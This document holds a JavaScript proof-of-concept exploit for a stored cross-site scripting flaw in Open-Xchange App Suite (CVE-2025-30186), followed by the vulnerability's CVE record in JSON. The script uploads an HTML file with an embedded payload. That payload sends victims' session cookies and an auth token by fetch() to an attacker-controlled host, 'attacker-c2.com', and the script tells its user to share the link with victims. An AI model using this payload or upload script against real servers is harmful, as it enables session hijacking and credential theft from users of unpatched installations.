CVE-2025-30186

// CVE-2025-30186 PoC - Open-Xchange XSS via File Upload // This PoC demonstrates the stored XSS vulnerability const https = require('https'); const targetHost = 'vulnerable-server.example.com'; const targetPath = '/api/v1/file/upload'; // Malicious file content with XSS payload const maliciousContent = `<script> // Steal session cookies document.cookie; // Exfiltrate sensitive data fetch('https://attacker-c2.com/steal?data=' + encodeURIComponent(document.cookie + '|' + localStorage.getItem('authToken'))); </script>`; // Prepare multipart form data for file upload const boundary = '----WebKitFormBoundary' + Math.random().toString(36).substring(2); const postData = `--${boundary}\r ` + `Content-Disposition: form-data; name="file"; filename="malicious.html"\r ` + `Content-Type: text/html\r ` + `\r ` + maliciousContent + `\r ` + `--${boundary}--\r `; const options = { hostname: targetHost, port: 443, path: targetPath, method: 'POST', headers: { 'Content-Type': 'multipart/form-data; boundary=' + boundary, 'Content-Length': Buffer.byteLength(postData) } }; const req = https.request(options, (res) => { let data = ''; res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { const response = JSON.parse(data); console.log('File uploaded. File ID:', response.fileId); console.log('Malicious URL:', response.fileUrl); console.log('Share this URL with victims to trigger XSS'); }); }); req.on('error', (e) => { console.error('Upload failed:', e.message); }); req.write(postData); req.end(); console.log('CVE-2025-30186 PoC - Open-Xchange Stored XSS'); console.log('Target: Open-Xchange App Suite'); console.log('Attack Vector: Upload malicious file -> Share link -> Victim clicks -> XSS executes');

{"cve": {"id": "CVE-2025-30186", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:51.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}